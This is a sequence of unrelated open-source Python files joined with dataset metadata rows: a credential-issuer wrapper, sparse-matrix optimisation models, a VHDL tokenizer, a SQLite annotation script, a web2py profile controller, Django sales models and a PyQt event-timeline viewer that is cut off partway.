Gets the offer message that can be sent to the specified connection
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.get_offer_msg(connection)
"""
if not hasattr(IssuerCredential.get_offer_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_offer_msg: Creating callback")
IssuerCredential.get_offer_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
msg = await do_call('vcx_issuer_get_credential_offer_msg',
c_credential_handle,
IssuerCredential.get_offer_msg.cb)
return json.loads(msg.decode())
async def send_credential(self, connection: Connection):
"""
Sends the credential to the end user (holder).
:param connection: Connection that identifies pairwise connection
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.send_credential, "cb"):
self.logger.debug("vcx_issuer_send_credential: Creating callback")
IssuerCredential.send_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_credential.cb)
async def get_credential_msg(self, my_pw_did: str):
"""
Get the credential to send to the end user (prover).
:param my_pw_did: my pw did associated with person I'm sending credential to
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.get_credential_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_msg: Creating callback")
IssuerCredential.get_credential_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
c_my_pw_did = c_char_p(json.dumps(my_pw_did).encode('utf-8'))
msg = await do_call('vcx_issuer_get_credential_msg',
c_credential_handle,
c_my_pw_did,
IssuerCredential.get_credential_msg.cb)
return json.loads(msg.decode())
async def revoke_credential(self):
"""
Revokes a credential.
:return: None
Example:
credential.revoke_credential()
"""
if not hasattr(IssuerCredential.revoke_credential, "cb"):
self.logger.debug("vcx_issuer_revoke_credential: Creating callback")
IssuerCredential.revoke_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
await do_call('vcx_issuer_revoke_credential',
c_credential_handle,
IssuerCredential.revoke_credential.cb)
async def get_payment_txn(self):
"""
Retrieve the payment transaction associated with this credential. This can be used to get the txn that
was used to pay the issuer from the prover. This could be considered a receipt of payment from the payer to
the issuer.
Example:
txn = credential.get_payment_txn()
:return: payment transaction
{
"amount":25,
"inputs":[
"pay:null:1_3FvPC7dzFbQKzfG",
"pay:null:1_lWVGKc07Pyc40m6"
],
"outputs":[
{"recipient":"pay:null:FrSVC3IrirScyRh","amount":5,"extra":null},
{"recipient":"pov:null:OsdjtGKavZDBuG2xFw2QunVwwGs5IB3j","amount":25,"extra":null}
]
}
"""
if not hasattr(IssuerCredential.get_payment_txn, "cb"):
self.logger.debug("vcx_issuer_credential_get_payment_txn: Creating callback")
IssuerCredential.get_payment_txn.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
payment_txn = await do_call('vcx_issuer_credential_get_payment_txn',
c_credential_handle,
IssuerCredential.get_payment_txn.cb)
return json.loads(payment_txn.decode())
|
apache-2.0
| -1,800,778,143,822,007,800
| 45.667575
| 172
| 0.624803
| false
| 3.860041
| false
| false
| false
|
PythonOptimizers/NLP.py
|
nlp/model/cysparsemodel.py
|
1
|
5725
|
try:
from cysparse.sparse.ll_mat import LLSparseMatrix
import cysparse.common_types.cysparse_types as types
except:
print "CySparse is not installed!"
from nlp.model.nlpmodel import NLPModel
from nlp.model.snlp import SlackModel
from nlp.model.qnmodel import QuasiNewtonModel
from pykrylov.linop import CysparseLinearOperator
import numpy as np
class CySparseNLPModel(NLPModel):
"""
An `NLPModel` where sparse matrices are returned as CySparse matrices.
The `NLPModel`'s `jac` and `hess` methods should return sparse
Jacobian and Hessian in coordinate format: (vals, rows, cols).
"""
def hess(self, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z).
Note that `rows`, `cols` and `vals` must represent a LOWER triangular
sparse matrix in the coordinate format (COO).
"""
vals, rows, cols = super(CySparseNLPModel, self).hess(*args, **kwargs)
H = LLSparseMatrix(size=self.nvar, size_hint=vals.size,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H.put_triplet(rows, cols, vals)
return H
def jac(self, *args, **kwargs):
"""Evaluate constraints Jacobian at x."""
vals, rows, cols = super(CySparseNLPModel, self).jac(*args, **kwargs)
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
itype=types.INT64_T, dtype=types.FLOAT64_T)
J.put_triplet(rows, cols, vals)
return J
try:
from nlp.model.amplmodel import AmplModel
class CySparseAmplModel(CySparseNLPModel, AmplModel):
# MRO: 1. CySparseAmplModel
# 2. CySparseNLPModel
# 3. AmplModel
# 4. NLPModel
#
# Here, `jac` and `hess` are inherited directly from CySparseNPLModel.
#
def A(self, *args, **kwargs):
"""
Evaluate sparse Jacobian of the linear part of the
constraints. Useful to obtain constraint matrix
when problem is a linear programming problem.
"""
vals, rows, cols = super(CySparseAmplModel, self).A(*args, **kwargs)
A = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
type=types.INT64_T, dtype=types.FLOAT64_T)
A.put_triplet(rows, cols, vals)
return A
def jop(self, *args, **kwargs):
"""Obtain Jacobian at x as a linear operator."""
return CysparseLinearOperator(self.jac(*args, **kwargs))
except ImportError:
pass
class CySparseSlackModel(SlackModel):
"""
Reformulate an optimization problem using slack variables.
New model represents matrices as `CySparse` matrices.
:parameters:
:model: Original model to be transformed into a slack form.
"""
def __init__(self, model, **kwargs):
if not isinstance(model, CySparseNLPModel):
msg = "The model in `model` should be a CySparseNLPModel"
msg += " or a derived class of it."
raise TypeError(msg)
super(CySparseSlackModel, self).__init__(model)
def _jac(self, x, lp=False):
"""Helper method to assemble the Jacobian matrix.
See the documentation of :meth:`jac` for more information.
The positional argument `lp` should be set to `True` only if the
problem is known to be a linear program. In this case, the evaluation
of the constraint matrix is cheaper and the argument `x` is ignored.
"""
m = self.m
model = self.model
on = self.original_n
lowerC = np.array(model.lowerC, dtype=np.int64)
nlowerC = model.nlowerC
upperC = np.array(model.upperC, dtype=np.int64)
nupperC = model.nupperC
rangeC = np.array(model.rangeC, dtype=np.int64)
nrangeC = model.nrangeC
# Initialize sparse Jacobian
nnzJ = self.model.nnzj + m
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar, size_hint=nnzJ,
store_symmetric=False, itype=types.INT64_T,
dtype=types.FLOAT64_T)
# Insert contribution of general constraints
if lp:
J[:on, :on] = self.model.A()
else:
J[:on, :on] = self.model.jac(x[:on])
# Create a few index lists
rlowerC = np.array(range(nlowerC), dtype=np.int64)
rupperC = np.array(range(nupperC), dtype=np.int64)
rrangeC = np.array(range(nrangeC), dtype=np.int64)
# Insert contribution of slacks on general constraints
J.put_triplet(lowerC, on + rlowerC,
-1.0 * np.ones(nlowerC, dtype=np.float64))
J.put_triplet(upperC, on + nlowerC + rupperC,
-1.0 * np.ones(nupperC, dtype=np.float64))
J.put_triplet(rangeC, on + nlowerC + nupperC + rrangeC,
-1.0 * np.ones(nrangeC, dtype=np.float64))
return J
def hess(self, x, z=None, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z)."""
model = self.model
if isinstance(model, QuasiNewtonModel):
return self.hop(x, z, *args, **kwargs)
if z is None:
z = np.zeros(self.m)
on = model.n
H = LLSparseMatrix(size=self.nvar, size_hint=self.model.nnzh,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H[:on, :on] = self.model.hess(x[:on], z, *args, **kwargs)
return H
|
lgpl-3.0
| -1,697,829,370,414,543,000
| 35.464968
| 80
| 0.591441
| false
| 3.605164
| false
| false
| false
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/vhdlFile/classify/association_element.py
|
1
|
1756
|
from vsg.token import association_element as token
from vsg.vhdlFile import utils
def detect(iCurrent, lObjects):
'''
association_element ::=
[ formal_part => ] actual_part
An association element will either end in a close parenthesis or a comma that is not within paranthesis.
accociation_element [)|,]
'''
iOpenParenthesis = 0
iCloseParenthesis = 0
iToken = iCurrent
while not utils.token_is_semicolon(iToken, lObjects):
iToken = utils.find_next_token(iToken, lObjects)
if utils.token_is_open_parenthesis(iToken, lObjects):
iOpenParenthesis += 1
if utils.token_is_close_parenthesis(iToken, lObjects):
iCloseParenthesis += 1
if iCloseParenthesis == iOpenParenthesis + 1:
classify(iCurrent, iToken, lObjects, ')')
return iToken
if iCloseParenthesis == iOpenParenthesis:
if utils.token_is_comma(iToken, lObjects):
classify(iCurrent, iToken, lObjects, ',')
return iToken
iToken += 1
return iToken
def classify(iStart, iEnd, lObjects, sEnd):
iCurrent = iStart
sPrint = ''
for oObject in lObjects[iStart:iEnd + 1]:
sPrint += oObject.get_value()
# Classify formal part if it exists
if utils.find_in_index_range('=>', iStart, iEnd, lObjects):
iCurrent = utils.assign_tokens_until('=>', token.formal_part, iCurrent, lObjects)
iCurrent = utils.assign_next_token_required('=>', token.assignment, iCurrent, lObjects)
# Classify actual part
for iCurrent in range(iCurrent, iEnd):
if utils.is_item(lObjects, iCurrent):
utils.assign_token(lObjects, iCurrent, token.actual_part)
return iCurrent
|
gpl-3.0
| -9,160,156,864,442,821,000
| 32.769231
| 108
| 0.646355
| false
| 3.605749
| false
| false
| false
|
sivareddyg/UDepLambda
|
scripts/graphquestions/dump_to_database.py
|
1
|
1094
|
import sys
import json
import random
import os
import sqlite3
items = []
for line in sys.stdin:
sent = json.loads(line)
items.append((sent['id'], sent['sentence']))
random.seed(1)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
conn = sqlite3.connect('working/annotations.db')
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE annotators
(email text PRIMARY KEY NOT NULL, name text, salary real DEFAULT 0.0)''')
c.execute('''CREATE TABLE sentences
(sentid INTEGER PRIMARY KEY, qid INTEGER, sentence text NOT NULL, translated integer DEFAULT 0, translation text, startstamp INTEGER DEFAULT 0, endstamp INTEGER, annotator text)''')
for item in items:
# Insert a row of data
value = {}
value['qid'] = item[0]
value['sentence'] = item[1]
c.execute("INSERT INTO sentences (qid,sentence) VALUES (:qid,:sentence);", value)
# Save (commit) the changes
conn.commit()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
|
apache-2.0
| 8,913,069,452,210,691,000
| 27.051282
| 194
| 0.71298
| false
| 3.50641
| false
| false
| false
|
trosa/forca
|
applications/ForCA/controllers/profile.py
|
1
|
2821
|
from operator import itemgetter
@auth.requires_login()
def home():
if auth.has_membership('Professor') and not request.vars:
prof_id = get_prof_id()
redirect(URL(request.application, 'prof', 'home', vars=dict(prof_id=prof_id)))
else:
if request.vars:
aluno_id = request.vars['aluno_id']
else:
aluno_id = get_aluno_id()
request.vars['aluno_id'] = aluno_id
#Verifica se quem ta acessando a página é o próprio aluno ou alguém de fora
if int(aluno_id) == get_aluno_id():
perfil_proprio = True
else:
perfil_proprio = False
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
aluno = db(db.alunos.id==aluno_id).select(db.alunos.ALL).first()
avaliacoes = db(db.avaliacoes.aluno_id==aluno_id)
#Pega informaçoes do conjunto de avaliações do aluno
evals_stats = get_evals_info(avaliacoes)
#Lista das últimas avaliações do aluno
raw_evals = avaliacoes.select(orderby=~db.avaliacoes.timestamp_eval, limitby=(0,3))
evals = refine_evals(raw_evals)
#Lista das últimas avaliações do aluno, que foram respondidas
avaliacoes_resp = avaliacoes(Avaliacoes.timestamp_reply!=None)
raw_evals = avaliacoes_resp.select(orderby=~Avaliacoes.timestamp_reply, limitby=(0,3))
evals_replyed = refine_evals(raw_evals)
#Lista das avaliações favoritas do user logado no momento
if perfil_proprio:
#raw_favoritos = db((db.favoritos.user_id==session.auth.user.id)&(db.avaliacoes.id==db.favoritos.avaliacao_id)).select(db.avaliacoes.ALL)
#evals_favorited = refine_evals(raw_favoritos)
evals_favorited = get_favorite_evals(session.auth.user.id)
else:
evals_favorited = []
return dict(aluno=aluno, perfil_proprio=perfil_proprio, user_evals = avaliacoes, evals=evals, evals_replyed=evals_replyed,\
evals_favorited=evals_favorited, evals_stats=evals_stats, page=page, per_page=10)
@auth.requires_membership('Aluno')
def favorites():
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
# if 'aluno_id' in request.vars:
# user_id = get_aluno_user_id(request.vars['aluno_id'])
# else:
user_id = session.auth.user.id
#favorite_evals = db((Favoritos.user_id==user_id)&(Avaliacoes.id==Favoritos.avaliacao_id)).select(Avaliacoes.ALL, limitby=limitby)
refined_favorites = get_favorite_evals(user_id)
return dict(evals=refined_favorites, page=page, per_page=10)
|
gpl-2.0
| 2,363,282,468,083,769,000
| 39.085714
| 149
| 0.618674
| false
| 2.814443
| false
| false
| false
|
alejo8591/maker
|
sales/models.py
|
1
|
18836
|
# encoding: utf-8
# Copyright 2013 maker
# License
"""
Sales module objects.
"""
from django.db import models
from maker.core.models import Object, User, ModuleSetting
from maker.identities.models import Contact
from maker.finance.models import Transaction, Currency, Tax
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from time import time as ttime
from decimal import *
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length = 512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank = True, null = True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
name = models.CharField(max_length = 512)
product_type = models.CharField(max_length=32,
default='good',
choices=(('service', 'Service'), ('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'), ))
parent = models.ForeignKey('self', blank=True, null=True, related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True, choices=(('inactive',
'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'), ))
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length = 512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
contact = models.ForeignKey(Contact)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=(('email', 'E-Mail'), ('phone', 'Phone'),
('post', 'Post'), ('face', 'Face to Face') ))
assigned = models.ManyToManyField(User, related_name = 'sales_lead_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(User, related_name = 'sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(User, related_name = 'sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't have to be unique)
next_ref = SaleOrder.objects.all().aggregate(models.Max('id'))['id__max']+1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime()*10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
#TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount']+=(item_total * (p.tax.rate/100)).quantize(Decimal('.01'), rounding = ROUND_UP)
else:
taxes[p.tax.id] = {'name':p.tax.name, 'rate':p.tax.rate,
'amount':(item_total * (p.tax.rate/100))
.quantize(Decimal('.01'), rounding = ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32,
choices=(('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly','Quarterly'),
('yearly', 'Yearly')),
default='month')
cycle_end = models.DateField(blank = True, null = True)
active = models.BooleanField(default=False)
details = models.CharField(max_length = 512, blank = True, null = True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'default_order_status')[0]
new_invoice.status = long(conf.value)
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
#if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
#Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
class Meta:
"OrderedProduct"
ordering = ['product']
|
mit
| -7,272,710,793,605,936,000
| 36.151874
| 124
| 0.552771
| false
| 4.223318
| false
| false
| false
|
PhilippMundhenk/IVNS
|
ECUInteraction/gui/plugins/views/event_line_view_impl.py
|
1
|
21119
|
'''
Created on 27 Apr, 2015
@author: artur.mrowca
'''
from gui.plugins.views.abstract_viewer_plug import AbstractViewerPlugin
from PyQt4.Qt import QWidget
from PyQt4 import QtGui
import pyqtgraph as pg
import numpy as np
from numpy.core.defchararray import isnumeric
from config import can_registration
from io_processing.surveillance_handler import MonitorTags, MonitorInput
from io_processing.result_interpreter.eventline_interpreter import EventlineInterpreter
from tools.general import General
from uuid import UUID
from math import floor
class ECUShowAxis(pg.AxisItem):
def __init__(self, orientation, *args):
pg.AxisItem.__init__(self, orientation, *args)
self.lanes_map = {} # key: number, value: text
def tickValues(self, minVal, maxVal, size):
minVal, maxVal = sorted((minVal, maxVal))
minVal *= self.scale
maxVal *= self.scale
# size *= self.scale
ticks = []
tickLevels = self.tickSpacing(minVal, maxVal, size)
allValues = np.array([])
for i in range(len(tickLevels)):
spacing, offset = tickLevels[i]
spacing = 1
# # determine starting tick
start = (np.ceil((minVal - offset) / spacing) * spacing) + offset
# # determine number of ticks
num = int((maxVal - start) / spacing) + 1
values = (np.arange(num) * spacing + start) / self.scale
# # remove any ticks that were present in higher levels
# # we assume here that if the difference between a tick value and a previously seen tick value
# # is less than spacing/100, then they are 'equal' and we can ignore the new tick.
values = list(filter(lambda x: all(np.abs(allValues - x) > spacing * 0.01), values))
allValues = np.concatenate([allValues, values])
ticks.append((spacing / self.scale, values))
if self.logMode:
return self.logTickValues(minVal, maxVal, size, ticks)
return ticks
def tickStrings(self, values, scale, spacing):
strns = []
for x in values:
try:
text = self.lanes_map[int(x)]
except:
text = ""
strns.append(text)
return strns
class EventlineViewPlugin(AbstractViewerPlugin):
def __init__(self, *args, **kwargs):
AbstractViewerPlugin.__init__(self, *args, **kwargs)
def get_combobox_name(self):
return "Chain of events"
def get_widget(self, parent):
self.gui = EventlineViewPluginGUI(parent)
return self.gui
def get_interpreters(self):
return [EventlineInterpreter]
def link_axis(self):
return self.gui.plot
def load(self, data):
self.gui.load(data)
def save(self):
return self.gui.save()
def update_gui(self, interpreter_input):
self.gui.update_gui(interpreter_input)
class EventlineViewPluginGUI(QWidget):
def __init__(self, parent):
QWidget.__init__(self, parent)
self.lastClicked = []
self._all_points = []
self.create_widgets(parent)
self._lane_map = {}
self._taken_lanes = {}
self.map_points = {}
self.known = []
self.COLOR_ECU_AUTH = (255, 0, 0)
self.COLOR_STR_AUTH = (0, 255, 0)
self.COLOR_SIMPLE = (0, 0, 255)
self.COLOR_PROCESS = (123, 123, 0)
self.COLOR_PROCESS_2 = (0, 123, 123)
self._init_categories()
self._mode = 'LW_AUTH'
self._pts_ecu = {}
def _already_there(self, mon_input):
''' handles duplicates'''
if hash(mon_input) in self.known:
return True
self.known.append(hash(mon_input))
if len(self.known) > 1000:
del self.known[:floor(float(len(self.known)) / 2.0)]
return False
def _clicked(self, plot, points):
for p in self.lastClicked:
p.resetPen()
try: info = points[0].data()
except: info = False
if info:
try: info[5]
except: info += [0, 0, 0, 0, 0]
if len(str(info[2])) > 100:
showos = info[2][:99]
else:
showos = info[2]
self.label.setText("ECU: %s\t\t Time:%s \t\nMessageID: %s \tMessage: %s \t\nSize: %s \t\t\tCorresponding ID: %s \tStream ID: %s" % (info[0], info[-1], self._id_to_str(info[1]), showos, info[3], info[6], info[5]))
for p in points:
p.setPen('b', width=2)
self.lastClicked = points
def _init_categories(self):
# TESLA
self.tesla_time_sync_send = [MonitorTags.CP_SEND_SYNC_MESSAGE, MonitorTags.CP_SEND_SYNC_RESPONSE_MESSAGE]
self.tesla_time_sync_rec = [MonitorTags.CP_RECEIVE_SYNC_RESPONSE_MESSAGE]
self.tesla_setup_send = [MonitorTags.CP_ENCRYPTED_EXCHANGE_FIRST_KEY_KN]
self.tesla_setup_rec = [MonitorTags.CP_RECEIVED_EXCHANGE_FIRST_KEY_KN]
self.tesla_simple_message_send = [MonitorTags.CP_MACED_TRANSMIT_MESSAGE]
self.tesla_simple_message_rec = [MonitorTags.CP_BUFFERED_SIMPLE_MESSAGE]
